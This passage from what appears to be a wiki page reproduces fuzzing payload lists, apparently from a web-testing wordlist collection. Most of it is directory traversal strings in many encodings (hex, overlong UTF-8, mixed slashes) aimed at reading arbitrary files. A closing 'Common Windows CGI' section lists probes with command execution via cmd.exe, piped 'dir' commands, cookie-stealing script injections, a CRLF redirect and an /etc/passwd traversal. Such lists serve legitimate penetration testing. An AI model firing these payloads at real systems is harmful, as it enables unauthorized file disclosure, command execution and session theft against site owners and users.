0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
